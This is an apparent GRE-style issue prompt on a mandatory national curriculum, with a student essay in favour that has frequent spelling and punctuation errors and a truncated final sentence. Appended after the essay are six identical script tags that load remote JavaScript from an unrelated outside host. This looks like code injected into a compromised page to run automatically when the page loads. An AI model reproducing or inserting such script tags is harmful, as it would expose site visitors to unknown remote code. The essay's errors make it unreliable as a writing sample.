“A nation should require all of its students to study the same national curriculum until they

enter college.”

Write a response in which you discuss the extent to which you agree or disagree with the

recommendation and explain your reasoning for the position you take. In developing and

supporting your position, describe specific circumstances in which adopting the

recommendation would or would not be advantageous and explain how these examples

shape your position.

I agree with the given statement.Students before entering the college should study the same national curriculum.This helps the students be on par with the one another with equal and same knowledge gained while entering the college.If we have different curriculum then one student might know one subject and another might not.For example if a school curriculum includes Indian history,geography in its curriculum and the other school does not have those subjects in it's curriculum.Instead it has history related to europian countries.This leads to a knowledge gap between students of same nation.One student might know about indian history and other doesn't.So students might not be able to share their interests with eachother if they do not have common things to share.This may lead to division of students between themselves based on their studied curriculum.If the above difference in curriculum is not present and every student study the same curriculum during their schooling then it leads to more friendliness by sharing their common interests,Having the same national curriculum also helps the students feel that there is no partiality in regards to the knowledge that have been tought in different schools.Some schools charge high fees so that they teach all the extra courses for the students of their school.This leads to knowledge gap between the students because only rich will be able to afford for such type of schools.Poor students will not be able to gain that knowledge leading to significant knowledge gap between students of same communities.Therefore,having a national curriculum common to everyone until they enter college is neccessary.After entering into the college student can explore their interests accordingly and move on.But it should be till the schooling level only becuase students get some kind of maturity as they enter the college and they will be in a position to decide which is good for them.They will be able to figure out what their interests are and will study those subjects accordingly.Hence a nation should require all its students to study the same national curriculum until they enter.<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>